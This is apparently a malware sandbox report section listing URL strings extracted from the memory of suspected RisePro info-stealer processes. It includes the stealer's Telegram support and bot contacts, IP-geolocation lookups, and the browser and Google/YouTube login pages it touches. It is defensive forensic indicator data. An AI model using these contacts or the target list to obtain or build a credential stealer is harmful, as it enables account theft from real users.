Source: MPGPH131.exe, 00000026.00000003.2738990555.0000000007D02000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736983747.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2754944956.0000000007CF2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2737261196.0000000007D02000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738854917.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738400789.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736140221.0000000007D04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https
Source: MPGPH131.exe, 00000026.00000003.2736140221.0000000007D04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2
Source: MPGPH131.exe, 00000026.00000003.2738990555.0000000007D02000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736983747.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2754944956.0000000007CF2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2737261196.0000000007D02000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738854917.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738400789.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736140221.0000000007D04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsig
Source: MPGPH131.exe, 00000026.00000003.2738559574.0000000007D9C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Fa
Source: powershell.exe, 0000000D.00000002.2413543741.0000017E22EF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2553378843.000001CA55221000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000001D.00000002.2553378843.000001CA56173000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2553378843.000001CA56849000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 0000000D.00000002.2413543741.0000017E2451E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2553378843.000001CA56849000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: 590971cd60.exe, 00000014.00000003.2583234242.0000000007F98000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2581877745.0000000007F70000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2589683699.0000000007FAB000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2722054145.0000000007DA8000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738126612.0000000007DB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 590971cd60.exe, 00000014.00000003.2583234242.0000000007F98000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2581877745.0000000007F70000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2589683699.0000000007FAB000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2722054145.0000000007DA8000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738126612.0000000007DB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 590971cd60.exe, 00000014.00000003.2583234242.0000000007F98000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2581877745.0000000007F70000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2589683699.0000000007FAB000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2722054145.0000000007DA8000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738126612.0000000007DB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 0000001D.00000002.2553378843.000001CA56AF9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001D.00000002.2553378843.000001CA56AF9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001D.00000002.2553378843.000001CA56AF9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: 590971cd60.exe, 00000014.00000002.2888771295.00000000018AE000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2749346705.0000000001409000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/
Source: 590971cd60.exe, 00000014.00000002.2888771295.00000000018AE000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2749346705.0000000001461000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2749346705.0000000001409000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=81.181.57.52
Source: 590971cd60.exe, 00000014.00000002.2888771295.00000000018AE000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2749346705.0000000001409000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com:443/demo/home.php?s=81.181.57.52
Source: 590971cd60.exe, 00000014.00000003.2583234242.0000000007F98000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2581877745.0000000007F70000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2589683699.0000000007FAB000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2722054145.0000000007DA8000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738126612.0000000007DB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 590971cd60.exe, 00000014.00000003.2583234242.0000000007F98000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2581877745.0000000007F70000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2589683699.0000000007FAB000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2722054145.0000000007DA8000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738126612.0000000007DB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 590971cd60.exe, 00000014.00000003.2583234242.0000000007F98000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2581877745.0000000007F70000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2589683699.0000000007FAB000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2722054145.0000000007DA8000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738126612.0000000007DB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 00000012.00000003.2427444325.0000019ECF4C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: svchost.exe, 00000012.00000003.2427444325.0000019ECF51A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 00000012.00000003.2427444325.0000019ECF4C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: svchost.exe, 00000012.00000003.2427444325.0000019ECF4A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2427444325.0000019ECF4E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000012.00000003.2427444325.0000019ECF4C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 0000001D.00000002.2553378843.000001CA55447000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2553378843.000001CA56AA3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000D.00000002.2501270876.0000017E3B66C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://go.microsoft.
Source: powershell.exe, 0000001D.00000002.2644719324.000001CA6D3B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://go.microsoft.c
Source: MPGPH131.exe, 00000026.00000002.2749346705.0000000001409000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/
Source: 590971cd60.exe, 00000014.00000002.2888771295.00000000018AE000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2749346705.0000000001409000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/Mozilla/5.0
Source: 590971cd60.exe, 00000014.00000002.2888771295.000000000180E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/R-
Source: 590971cd60.exe, 00000014.00000003.2487222595.00000000053D0000.00000004.00001000.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000002.2886812747.0000000000B81000.00000040.00000001.01000000.00000014.sdmp, MPGPH131.exe, 00000026.00000003.2553507559.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2747704687.0000000000631000.00000040.00000001.01000000.00000017.sdmp String found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll
Source: MPGPH131.exe, 00000026.00000002.2749346705.00000000013EF000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2749346705.0000000001409000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/81.181.57.52
Source: 590971cd60.exe, 00000014.00000002.2888771295.000000000188C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/81.181.57.52u
Source: 590971cd60.exe, 00000014.00000002.2888771295.00000000018A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io:443/widget/demo/81.181.57.52
Source: MPGPH131.exe, 00000026.00000002.2749346705.0000000001409000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io:443/widget/demo/81.181.57.52lM
Source: powershell.exe, 0000000D.00000002.2413543741.0000017E248B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2449781101.0000017E32F5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2625392452.000001CA65298000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2553378843.000001CA56AF9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000012.00000003.2427444325.0000019ECF4C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: svchost.exe, 00000012.00000003.2427444325.0000019ECF456000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: MPGPH131.exe, 00000026.00000003.2727003523.0000000007CF2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: MPGPH131.exe, 00000026.00000003.2727003523.0000000007CF2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: 590971cd60.exe, 00000014.00000003.2582617431.0000000007F5E000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2754944956.0000000007CA6000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2734561741.0000000007CF9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736489776.0000000007D02000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736140221.0000000007D04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736489776.0000000007D02000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736140221.0000000007D04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016/ee
Source: MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736489776.0000000007D02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: 590971cd60.exe, 00000014.00000003.2582617431.0000000007F5E000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736983747.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2754944956.0000000007CF2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2734561741.0000000007CF9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736489776.0000000007D02000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738854917.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738400789.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736140221.0000000007D04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736489776.0000000007D02000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736140221.0000000007D04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17/ewGpY
Source: MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736489776.0000000007D02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: 590971cd60.exe, 00000014.00000002.2888771295.0000000001868000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000002.2888771295.000000000180E000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2749346705.000000000137D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/RiseProSUPPORT
Source: 590971cd60.exe, 00000014.00000002.2888771295.000000000180E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/RiseProSUPPORTr
Source: MPGPH131.exe, 00000026.00000002.2749346705.0000000001409000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_bot
Source: 590971cd60.exe, 00000014.00000002.2888771295.00000000018AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_bot.52
Source: MPGPH131.exe, 00000026.00000002.2749346705.0000000001409000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_botI
Source: 590971cd60.exe, 00000014.00000002.2888771295.00000000018AE000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2749346705.0000000001409000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_botisepro_bot
Source: 590971cd60.exe, 00000014.00000003.2583234242.0000000007F98000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2581877745.0000000007F70000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2589683699.0000000007FAB000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2722054145.0000000007DA8000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738126612.0000000007DB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: 590971cd60.exe, 00000014.00000003.2583234242.0000000007F98000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2581877745.0000000007F70000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2589683699.0000000007FAB000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2722054145.0000000007DA8000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738126612.0000000007DB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: MPGPH131.exe, 00000026.00000003.2727003523.0000000007CF2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: MPGPH131.exe, 00000026.00000003.2727003523.0000000007CF2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: 590971cd60.exe, 00000014.00000002.2888771295.00000000018AE000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2749346705.0000000001461000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: 590971cd60.exe, 00000014.00000003.2584100519.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2588756879.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2583846595.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2585534722.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2586892296.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000002.2894808239.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2582192926.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2582507104.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2597045577.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2591446745.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2598755903.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2585217441.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2580096642.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2599973969.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2591019092.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2599301102.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2594404316.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2595186539.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2586353379.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2590241789.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2581314601.0000000007F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: MPGPH131.exe, 00000026.00000002.2749346705.0000000001461000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/f
Source: MPGPH131.exe, 00000026.00000003.2727003523.0000000007CF2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 590971cd60.exe, 00000014.00000002.2888771295.00000000018AE000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2749346705.0000000001461000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: 590971cd60.exe, 00000014.00000003.2584100519.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2588756879.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2583846595.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2585534722.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2586892296.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000002.2894808239.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2582192926.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2582507104.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2597045577.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2591446745.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2598755903.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2585217441.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2580096642.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2599973969.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2591019092.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2599301102.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2594404316.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2595186539.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2586353379.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2590241789.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2581314601.0000000007F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: 590971cd60.exe, 00000014.00000002.2888771295.00000000018AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/index
Source: 590971cd60.exe, 00000014.00000002.2888771295.00000000018AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/r
Source: bad48ea9ac.exe, 0000000F.00000003.2686052943.0000000003E1A000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000000F.00000003.2684405158.0000000003E1A000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000000F.00000003.2687568679.0000000003DA1000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000000F.00000003.2672235494.0000000003D8E000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000000F.00000003.2670877909.0000000003D81000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000000F.00000003.2683839052.0000000003E19000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000000F.00000002.2690904429.0000000003E31000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000000F.00000003.2672330452.0000000003D9A000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000000F.00000003.2687145473.0000000003E2E000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2582617431.0000000007F5E000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000001F.00000003.2775112265.0000000003B25000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000001F.00000002.2819404632.0000000003F66000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000001F.00000003.2775942820.0000000003B56000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000001F.00000003.2813883212.0000000003BDE000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000001F.00000003.2813719721.0000000003B5D000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000001F.00000003.2775888301.0000000003B4A000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000001F.00000003.2810834359.0000000003BD6000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000001F.00000003.2808553560.0000000003BD5000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000001F.00000002.2818935392.0000000003BDE000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000001F.00000003.2775664992.0000000003B36000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000001F.00000003.2811449608.0000000003BDE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account
Source: MPGPH131.exe, 00000026.00000003.2738990555.0000000007D02000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736983747.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2754944956.0000000007CF2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2737261196.0000000007D02000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736489776.0000000007D02000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738854917.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738400789.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736140221.0000000007D04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account/t
Source: MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736489776.0000000007D02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountYouTube
Source: MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736489776.0000000007D02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountYouTube/t
Source: bad48ea9ac.exe, 0000001F.00000003.2813883212.0000000003BDE000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000001F.00000003.2810834359.0000000003BD6000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000001F.00000003.2808553560.0000000003BD5000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000001F.00000002.2818935392.0000000003BDE000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000001F.00000003.2811449608.0000000003BDE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountn
